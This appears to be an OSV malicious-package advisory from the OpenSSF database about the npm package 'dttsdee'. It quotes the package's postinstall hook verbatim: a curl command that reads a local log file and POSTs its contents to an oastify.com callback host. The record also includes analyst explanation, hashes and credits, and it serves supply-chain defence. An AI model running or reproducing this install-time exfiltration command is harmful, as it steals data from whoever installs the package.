{"id":"MAL-2026-6462","summary":"Malicious code in dttsdee (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9)\npackage.json declares a postinstall lifecycle script that runs automatically on `npm install`: `curl -X POST -d \"$(cat /data/logs/monitor-2026-06-25.log)\" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data`. The hook reads a file from the installer's filesystem and POSTs its contents over cleartext HTTP to an attacker-controlled subdomain on oastify.com (Burp Suite's Collaborator out-of-band callback service, commonly used for data exfiltration and SSRF research). The package advertises itself as a string-utility library (`easy-string-kit` in source) but is published under the unrelated name `dttsdee` with empty author/repository/homepage/bugs metadata; the innocuous string-helper code in index.js is cover for the install-time exfiltration. The combination of generic placeholder metadata, mismatched name/internal-description, and an automatic OOB exfil beacon on a researcher/attacker callback domain is a throwaway malicious package (likely dependency-confusion PoC or active attack).\n\n## Source: ossf-package-analysis (4c2da603726677a712bcd1e3ce798e5b3f2eed115827085596589c40613e9ad6)\nThe OpenSSF Package Analysis project identified 'dttsdee' @ 1.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package communicates with a domain associated with malicious activity.\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-06-25T16:31:23.307539782Z","published":"2026-06-25T10:51:03Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-25T11:27:35.79112341Z","modified_time":"2026-06-25T10:51:03Z","versions":["1.0.0"],"source":"ossf-package-analysis","sha256":"4c2da603726677a712bcd1e3ce798e5b3f2eed115827085596589c40613e9ad6"},{"versions":["1.0.0"],"source":"amazon-inspector","sha256":"56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9","import_time":"2026-06-25T16:23:39.779247729Z","id":"IN-MAL-2026-007509","modified_time":"2026-06-25T16:09:34Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/dttsdee/v/1.0.0"}],"affected":[{"package":{"name":"dttsdee","ecosystem":"npm","purl":"pkg:npm/dttsdee"},"versions":["1.0.0"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"tlsh":"4c01cb18c6745d3315d86b30bdab0a42b112ae5709043c0977c3812c0faf7af51fe62d","path":"package.json","sha256":"f191101d2692e8d9f0e8cf68bff87e14075ee3c658c4388ab45a1849ebfc9210"}],"package_integrity":[{"filename":"dttsdee-1.0.0.tgz","hashes":{"sha512_sri":"sha512-GClNgEVcW5emUn5hrcTYpjiZcQTj/MWhS4L+9z98i4CA9cwE3S9e8O761lYczdp2uXat6sbnJjTiUQbsZwVFhg==","sha1":"9a2690c9c1114761471480c87e47edaf373ce012"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dttsdee/MAL-2026-6462.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}